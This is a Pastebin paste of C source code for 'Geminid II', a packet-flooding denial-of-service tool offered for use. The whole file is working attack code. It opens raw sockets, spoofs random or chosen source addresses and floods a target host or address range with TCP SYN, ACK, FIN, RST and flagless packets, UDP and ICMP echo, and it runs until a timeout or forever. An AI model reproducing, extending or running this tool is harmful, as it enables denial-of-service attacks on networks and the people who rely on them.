MRC

G3m

MRC
Feb 25th, 2012
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 14.85 KB | None | 0 0
  1. /*
  2.  * Geminid II. TCP/UDP/ICMP Packet flooder
  3.  *
  4.  *
  5.  * Usage: geminid [-T -U -I -N -s -h -d -p -q -l -t]
  6.  *
  7.  *     -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN]   (no default         )
  8.  *     -U UDP attack                                (no options         )
  9.  *     -I ICMP attack                               (no options         )
  10.  *     -N Bogus No flag attack                      (no options         )
  11.  *     -s source class/ip                           (defaults to random )
  12.  *     -h destination host/ip                       (no default         )
  13.  *     -d destination class                         (no default         )
  14.  *     -p destination port range [start,end]        (defaults to random )
  15.  *     -q source port range [start,end]             (defaults to random )
  16.  *     -l % of box link to use                      (defaults to 100%   )
  17.  *     -t timeout                                   (defaults to forever)
  18.  *
  19.  *
  20.  * Compiling
  21.  *
  22.  *      Default:
  23.  *      % gcc g3m.c -o g3m
  24.  *
  25.  *      With password file option:
  26.  *      % gcc -DF_PASS geminid.c -o geminid
  27.  *
  28.  * by LIVE
  29.  */
  30.  
  31.  
  32.  
  33. #include <stdio.h>
  34. #include <stdlib.h>
  35. #include <unistd.h>
  36. #include <netdb.h>
  37. #include <sys/types.h>
  38.  
  39. #ifdef F_PASS
  40. #include <sys/stat.h>
  41. #endif
  42.  
  43. #include <netinet/in_systm.h>                                                  
  44. #include <sys/socket.h>
  45. #include <string.h>
  46. #include <time.h>
  47.  
  48. #ifndef __USE_BSD
  49. #   define __USE_BSD
  50. #endif
  51.  
  52. #ifndef __FAVOR_BSD
  53. #   define __FAVOR_BSD
  54. #endif
  55.  
  56. #include <netinet/in.h>
  57. #include <netinet/ip.h>
  58. #include <netinet/tcp.h>
  59. #include <netinet/udp.h>
  60. #include <netinet/ip_icmp.h>
  61. #include <arpa/inet.h>
  62.  
  63.  
  64. #ifdef LINUX
  65. #   define FIX(x)  htons(x)
  66. #else
  67. #   define FIX(x)  (x)
  68. #endif
  69.  
  70.  
  71. /* Geminid attack flags */
  72. #define TCP_ACK         1
  73. #define TCP_FIN         2
  74. #define TCP_SYN         4
  75. #define TCP_RST         8
  76. #define UDP_CFF        16
  77. #define ICMP_ECHO_G    32
  78. #define TCP_NOF        64 /* -N */
  79.  
  80. /* No flag attack */
  81. #define TH_NOF         0x0
  82.  
  83. #define TCP_ATTACK()    (a_flags & TCP_ACK ||\
  84.                          a_flags & TCP_FIN ||\
  85.                          a_flags & TCP_SYN ||\
  86.                          a_flags & TCP_RST ||\
  87.                          a_flags & TCP_NOF)
  88.  
  89.  
  90. #define UDP_ATTACK()    (a_flags & UDP_CFF)
  91. #define ICMP_ATTACK()   (a_flags & ICMP_ECHO_G)
  92.  
  93.  
  94. #define CHOOSE_DST_PORT() dst_sp == 0 ?\
  95.                           random ()   :\
  96.                           htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
  97.  
  98.  
  99. #define CHOOSE_SRC_PORT() src_sp == 0 ?\
  100.                           random ()   :\
  101.                           htons(src_sp + (random() % (src_ep -src_sp +1)));
  102.  
  103.  
  104. #define SEND_PACKET()   if (sendto(rawsock,\
  105.                                    &packet,\
  106.                                    (sizeof packet),\
  107.                                    0,\
  108.                                    (struct sockaddr *)&target,\
  109.                                     sizeof target) < 0) {\
  110.                                         perror("sendto");\
  111.                                         exit(-1);\
  112.                         }
  113.  
  114.  
  115.  
  116. /* Linux / SunOS x86 / FreeBSD */
  117. //#define BANNER_CKSUM 54018
  118.  
  119. /* SunOS Sparc */
  120. #define BANNER_CKSUM 723
  121.  
  122.  
  123. u_long lookup(const char *host);
  124. unsigned short in_cksum(unsigned short *addr, int len);                        
  125. static void inject_iphdr(struct ip *ip, u_char p, u_char len);
  126. char *class2ip(const char *class);
  127. static void send_tcp(u_char th_flags);
  128. static void send_udp(u_char garbage);
  129. static void send_icmp(u_char garbage);
  130. char *get_plain(const char *crypt_file, const char *xor_data_key);
  131. static void usage(const char *argv0);
  132.  
  133.  
  134. u_long dstaddr;
  135. u_short dst_sp, dst_ep, src_sp, src_ep;
  136. char *src_class, *dst_class;
  137. int a_flags, rawsock;
  138. struct sockaddr_in target;
  139.  
  140. /* Self promotion :) */
  141. const char *banner = "Geminid II. by live [TCP/UDP/ICMP Packet flooder]";
  142.  
  143. struct pseudo_hdr {         /* See RFC 793 Pseudo Header */
  144.     u_long saddr, daddr;    /* source and dest address   */
  145.     u_char mbz, ptcl;       /* zero and protocol         */
  146.     u_short tcpl;           /* tcp length                */
  147. };
  148.  
  149. struct cksum {
  150.     struct pseudo_hdr pseudo;
  151.     struct tcphdr tcp;
  152. };
  153.  
  154.  
  155. struct {
  156.     int gv; /* Geminid value */
  157.     int kv; /* Kernel value */
  158.     void (*f)(u_char);
  159. } a_list[] = {
  160.  
  161.         /* TCP */
  162.     { TCP_ACK, TH_ACK, send_tcp },
  163.     { TCP_FIN, TH_FIN, send_tcp },
  164.     { TCP_SYN, TH_SYN, send_tcp },
  165.     { TCP_RST, TH_RST, send_tcp },
  166.     { TCP_NOF, TH_NOF, send_tcp }, /* No flag attack */
  167.  
  168.         /* UDP */
  169.     { UDP_CFF, 0, send_udp },
  170.  
  171.         /* ICMP */
  172.     { ICMP_ECHO_G, ICMP_ECHO, send_icmp },
  173.     { 0, 0, (void *)NULL },
  174. };
  175.  
  176.  
  177. int
  178. main(int argc, char *argv[])
  179. {
  180.     int n, i, on = 1;
  181.     int b_link;
  182. #ifdef F_PASS
  183.     struct stat sb;
  184. #endif
  185.     unsigned int until;
  186.  
  187.  
  188.     a_flags = dstaddr = i = 0;
  189.     dst_sp = dst_ep = src_sp = src_ep = 0;
  190.     until = b_link = -1;
  191.     src_class = dst_class = NULL;
  192.     while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) {
  193.         char *p;
  194.  
  195.         switch (n) {
  196.             case 'T': /* TCP attack
  197.                        *
  198.                        * 0: ACK
  199.                        * 1: FIN
  200.                        * 2: RST
  201.                        * 3: SYN
  202.                        */
  203.  
  204.                 switch (atoi(optarg)) {
  205.                     case 0: a_flags |= TCP_ACK; break;
  206.                     case 1: a_flags |= TCP_FIN; break;
  207.                     case 2: a_flags |= TCP_RST; break;
  208.                     case 3: a_flags |= TCP_SYN; break;
  209.                 }
  210.                 break;
  211.  
  212.             case 'U': /* UDP attack
  213.                        */
  214.                 a_flags |= UDP_CFF;
  215.                 break;
  216.  
  217.             case 'I': /* ICMP attack
  218.                        */
  219.                 a_flags |= ICMP_ECHO_G;
  220.                 break;
  221.  
  222.             case 'N': /* Bogus No flag attack (TCP)
  223.                        */
  224.                 a_flags |= TCP_NOF;
  225.                 break;
  226.  
  227.             case 's':
  228.                 src_class = optarg;
  229.                 break;
  230.  
  231.             case 'h':
  232.                 dstaddr = lookup(optarg);    
  233.                 break;
  234.  
  235.             case 'd':
  236.                 dst_class = optarg;
  237.                 i = 1; /* neat flag to check command line later */
  238.                 break;
  239.  
  240.             case 'p':
  241.                 if ( (p = (char *) strchr(optarg, ',')) == NULL)
  242.                     usage(argv[0]);
  243.                 dst_sp = atoi(optarg); /* Destination start port */
  244.                 dst_ep = atoi(p +1);   /* Destination end port */
  245.                 break;
  246.  
  247.             case 'q':
  248.                 if ( (p = (char *) strchr(optarg, ',')) == NULL)
  249.                     usage(argv[0]);
  250.                 src_sp = atoi(optarg); /* Source start port */
  251.                 src_ep = atoi(p +1);   /* Source end port */
  252.                 break;
  253.  
  254.             case 'l':
  255.                 b_link = atoi(optarg);
  256.                 if (b_link <= 0 || b_link > 100)
  257.                     usage(argv[0]);
  258.                 break;
  259.  
  260.             case 't':
  261.                 until = time(0) +atoi(optarg);
  262.                 break;
  263.  
  264.             default:
  265.                 usage(argv[0]);
  266.                 break;
  267.         }
  268.     }
  269.  
  270.     /* Checking command line */
  271.     if ( (!dstaddr && !i) ||
  272.          (dstaddr && i) ||
  273.          (!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
  274.          (src_sp != 0 && src_sp > src_ep) ||
  275.          (dst_sp != 0 && dst_sp > dst_ep))
  276.             usage(argv[0]);
  277.  
  278.     srandom(time(NULL) ^ getpid());
  279.  
  280.     /* Opening RAW socket */
  281.     if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
  282.         perror("socket");
  283.         exit(-1);
  284.     }
  285.  
  286.     if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
  287.         (char *)&on, sizeof(on)) < 0) {
  288.             perror("setsockopt");
  289.             exit(-1);
  290.     }
  291.  
  292.     /* Filling target structure */
  293.     target.sin_family           = AF_INET;
  294.  
  295.     /* Packeting! */
  296.     for (n = 0; ; ) {
  297.  
  298.         /* Poor link control handling */
  299.         if (b_link != -1 && random() % 100 +1 > b_link) {
  300.             if (random() % 200 +1 > 199)
  301.                 usleep(1);
  302.             continue;
  303.         }
  304.  
  305.         /* Sending requested packets */
  306.         for (i = 0; a_list[i].f != NULL; ++i) {
  307.             if (a_list[i].gv & a_flags)
  308.                 a_list[i].f(a_list[i].kv);
  309.         }        
  310.  
  311.         /* Attack is finished? Do not check it every time, would eat
  312.          * too much CPU */
  313.         if (n++ == 100) {
  314.             if (until != -1 && time(0) >= until) break;
  315.             n = 0;
  316.         }
  317.     }
  318.                
  319.     exit(0);
  320. }
  321.  
  322.  
  323. u_long
  324. lookup(const char *host)
  325. {
  326.     struct hostent *hp;
  327.  
  328.     if ( (hp = gethostbyname(host)) == NULL) {
  329.         perror("gethostbyname");
  330.         exit(-1);
  331.     }
  332.  
  333.     return *(u_long *)hp->h_addr;
  334. }
  335.  
  336.  
  337. #define RANDOM() (int) random() % 255 +1
  338.  
  339. char *
  340. class2ip(const char *class)
  341. {
  342.     static char ip[16];
  343.     int i, j;
  344.  
  345.     for (i = 0, j = 0; class[i] != '\0'; ++i)
  346.         if (class[i] == '.')
  347.             ++j;
  348.  
  349.     switch (j) {
  350.         case 0:
  351.             sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
  352.             break;
  353.         case 1:
  354.             sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
  355.             break;
  356.         case 2:
  357.             sprintf(ip, "%s.%d", class, RANDOM());
  358.             break;
  359.  
  360.         /* Spoofing single host */
  361.         default: strncpy(ip, class, 16);
  362.                  break;
  363.     }
  364.     return ip;
  365. }
  366.  
  367.  
  368. unsigned short
  369. in_cksum(unsigned short *addr, int len)
  370. {
  371.     int nleft = len;
  372.     int sum = 0;
  373.     unsigned short *w = addr;
  374.     unsigned short answer = 0;
  375.  
  376.     /*
  377.      * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  378.      * sequential 16 bit words to it, and at the end, fold back all the
  379.      * carry bits from the top 16 bits into the lower 16 bits.
  380.      */
  381.     while (nleft > 1) {
  382.         sum += *w++;
  383.         nleft -= 2;
  384.     }
  385.  
  386.     /*
  387.      * Mop up an odd byte, if necessary
  388.      */
  389.     if (nleft == 1) {
  390.         *(unsigned char *) (&answer) = *(unsigned char *)w;
  391.         sum += answer;
  392.     }
  393.  
  394.     /*
  395.      * Add back carry outs from top 16 bits to low 16 bits
  396.      */
  397.     sum    = (sum >> 16) + (sum & 0xffff);  /* add hi 16 to low 16 */
  398.     sum   += (sum >> 16);                   /* add carry           */
  399.     answer = ~sum;                          /* truncate to 16 bits */
  400.  
  401.     return answer;
  402. }
  403.  
  404.  
  405. /*
  406.  * Creating generic ip header, not yet ready to be used.
  407.  */
  408. static void
  409. inject_iphdr(struct ip *ip, u_char p, u_char len)
  410. {
  411.  
  412.  
  413.     /* Filling IP header */
  414.     ip->ip_hl             = 5;
  415.     ip->ip_v              = 4;
  416.     ip->ip_p              = p;
  417.     ip->ip_tos            = 0x08; /* 0x08 */
  418.     ip->ip_id             = random();
  419.     ip->ip_len            = len;
  420.     ip->ip_off            = 0;
  421.     ip->ip_ttl            = 255;
  422.  
  423.     ip->ip_dst.s_addr     = dst_class != NULL ?
  424.                             inet_addr(class2ip(dst_class)) :
  425.                             dstaddr;
  426.  
  427.     ip->ip_src.s_addr     = src_class != NULL ?
  428.                             inet_addr(class2ip(src_class)) :
  429.                             random();
  430.  
  431.     /* I know, this is not part of the game, but anyway.. */
  432.     target.sin_addr.s_addr = ip->ip_dst.s_addr;
  433. }    
  434.  
  435.  
  436. static void
  437. send_tcp(u_char th_flags)
  438. {
  439.     struct cksum cksum;
  440.     struct packet {
  441.         struct ip ip;
  442.         struct tcphdr tcp;
  443.     } packet;
  444.  
  445.  
  446.     /* Filling IP header */
  447.     memset(&packet, 0, sizeof packet);
  448.     inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
  449.     packet.ip.ip_sum        = in_cksum((void *)&packet.ip, 20);
  450.  
  451.     /* Filling cksum pseudo header */
  452.     cksum.pseudo.daddr      = dstaddr;
  453.     cksum.pseudo.mbz        = 0;
  454.     cksum.pseudo.ptcl       = IPPROTO_TCP;
  455.     cksum.pseudo.tcpl       = htons(sizeof(struct tcphdr));
  456.     cksum.pseudo.saddr      = packet.ip.ip_src.s_addr;
  457.  
  458.     /* Filling TCP header */
  459.     packet.tcp.th_flags     = 0;
  460.     packet.tcp.th_win       = htons(65535);
  461.     packet.tcp.th_seq       = random();
  462.     packet.tcp.th_ack       = 0;
  463.     packet.tcp.th_flags     = th_flags;
  464.     packet.tcp.th_off       = 5;
  465.     packet.tcp.th_urp       = 0;
  466.     packet.tcp.th_sport     = CHOOSE_SRC_PORT();
  467.     packet.tcp.th_dport     = CHOOSE_DST_PORT();
  468.     cksum.tcp               = packet.tcp;
  469.     packet.tcp.th_sum       = in_cksum((void *)&cksum, sizeof(cksum));
  470.     SEND_PACKET();
  471. }
  472.  
  473.  
  474. static void
  475. send_udp(u_char garbage) /* No use for garbage here, just to remain */
  476. {                        /* coherent with a_list[]                  */
  477.     struct packet {
  478.         struct ip ip;
  479.         struct udphdr udp;
  480.     } packet;
  481.  
  482.  
  483.     /* Filling IP header */
  484.     memset(&packet, 0, sizeof packet);
  485.     inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
  486.     packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);
  487.  
  488.     /* Filling UDP header */
  489.     packet.udp.uh_sport         = CHOOSE_SRC_PORT();
  490.     packet.udp.uh_dport         = CHOOSE_DST_PORT();
  491.     packet.udp.uh_ulen          = htons(sizeof packet.udp);
  492.     packet.udp.uh_sum           = 0; /* No checksum */
  493.     SEND_PACKET();
  494. }
  495.  
  496.  
  497. static void
  498. send_icmp(u_char gargabe) /* Garbage discarded again.. */
  499. {
  500.     struct packet {
  501.         struct ip ip;
  502.         struct icmp icmp;
  503.     } packet;
  504.  
  505.  
  506.     /* Filling IP header */
  507.     memset(&packet, 0, sizeof packet);
  508.     inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
  509.     packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);
  510.  
  511.     /* Filling ICMP header */
  512.     packet.icmp.icmp_type       = ICMP_ECHO;
  513.     packet.icmp.icmp_code       = 0;
  514.     packet.icmp.icmp_cksum      = htons( ~(ICMP_ECHO << 8));
  515.     SEND_PACKET();
  516. }
  517.  
  518.  
  519. static void
  520. usage(const char *argv0)
  521. {
  522.     printf("%s \n", banner);
  523.     printf("Usage: %s [-T -U -I -N -s -h -d -p -q -l -t]\n\n", argv0);
  524.  
  525. printf("REGISTERED TO: seilaqm..\n\n");
  526.  
  527. printf("    -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN]   (no default         )\n");
  528. printf("    -U UDP attack                                (no options         )\n");
  529. printf("    -I ICMP attack                               (no options         )\n");
  530. printf("    -N Bogus No flag attack                      (no options         )\n");
  531. printf("    -s source class/ip                           (defaults to random )\n");
  532. printf("    -h destination host/ip                       (no default         )\n");
  533. printf("    -d destination class                         (no default         )\n");
  534. printf("    -p destination port range [start,end]        (defaults to random )\n");
  535. printf("    -q source port range [start,end]             (defaults to random )\n");
  536. printf("    -l %% of box link to use                      (defaults to 100%%   )\n");
  537. printf("    -t timeout                                   (defaults to forever)\n");
  538.  
  539.  
  540.     exit(-1);
  541. }
Add Comment
Please, Sign In to add comment